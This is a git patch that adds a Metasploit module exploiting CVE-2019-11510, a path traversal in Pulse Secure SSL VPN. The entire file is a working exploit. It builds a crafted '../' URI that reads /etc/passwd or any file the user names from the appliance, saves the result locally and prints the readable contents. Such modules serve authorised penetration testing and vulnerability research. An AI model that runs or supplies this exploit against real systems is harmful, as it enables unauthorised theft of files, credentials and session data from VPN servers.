From dbcdfe8332bc3b265c0ff1f7fda43355f2abc428 Mon Sep 17 00:00:00 2001 From: Dezzy Date: Wed, 21 Aug 2019 15:58:58 -0500 Subject: [PATCH] Create pulse_secure_file_disclosure.rb --- .../gather/pulse_secure_file_disclosure.rb | 112 ++++++++++++++++++ 1 file changed, 112 insertions(+) create mode 100644 modules/auxiliary/gather/pulse_secure_file_disclosure.rb diff --git a/modules/auxiliary/gather/pulse_secure_file_disclosure.rb b/modules/auxiliary/gather/pulse_secure_file_disclosure.rb new file mode 100644 index 0000000000..634ce3cc87 --- /dev/null +++ b/modules/auxiliary/gather/pulse_secure_file_disclosure.rb @@ -0,0 +1,112 @@ +## +# This module requires Metasploit: https://Metasploit.com/download +# +## + +class MetasploitModule < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Post::File + + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Pulse Secure SSL VPN guacamole Path Traversal', + 'Description' => %q{ + Pulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests. + This exploit reads the specified file, and displays it. + This vulnerability affect ( 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 + }, + 'References' => + [ + [ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510' ], + [ 'CVE', '2019-11510'], + ], + 'Author' => [ + 'Alyssa Herrera', # Proof of Concept + 'Justin Wagner', # 0xDezzy - Metasploit + 'Orange Tsai' # Discovery + ], + 'License' => MSF_LICENSE, + )) + + register_options( + [ + Opt::RPORT(443), + OptBool.new('SSL', [true, 'Use SSL', true]), + OptString.new('FILE', [ '/etc/passwd', "Define the remote file to view, ex:/etc/passwd", '/etc/passwd']), + ]) + + end + + def check + #Tests to see if it can get /etc/passwd. If it can, it's vulnerable + uri = '/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/' + + print_good("Checking target...") + res = send_request_raw({ + 'method' => 'GET', + 'uri' => uri + }) + + unless res && res.code ==200 + return Exploit::CheckCode::Safe + end + + Msf::Exploit::CheckCode::Vulnerable + end + + def run + + uri = '/dana-na/../dana/html5acc/guacamole/' + file = datastore['FILE'] + payload = "../../../../../..#{file}?/dana/html5acc/guacamole/" + + print_status("Starting Exploit...") + + res = send_request_raw( + { + 'method' => 'GET', + 'uri' => uri + payload, + },1395) + + if res.nil? + print_error("Connection timed out") + return + end + + if (res.code == 200) + print_good("Target is Vulnerable!") + data = res.body + current_host = datastore['RHOST'] + filename = "msf_sslwebsession_"+current_host+".bin" + File.delete(filename) if File.exist?(filename) + file_local_write(filename, data) + print_good("Parsing file.......") + parse() + else + if(res && res.code == 404) + print_error("Target not Vulnerable or Invalid File Path") + else + print_error("Ooof, try again...") + end + end + end + + def parse() + current_host = datastore['RHOST'] + fileObj = File.new("msf_sslwebsession_"+current_host+".bin", "r") + #fileObj = store_loot("msf_sslwebsession.bin", 'plain/text', "msf_sslwebsession.bin", 'Downloaded file from pulse secure') + words = 0 + while (line = fileObj.gets) + printable_data = line.gsub(/[^[:print:]]/, '.') + array_data = printable_data.scan(/.{1,60}/m) + for ar in array_data + if ar != "............................................................" + print_good(ar) + end + end + end + fileObj.close + end +end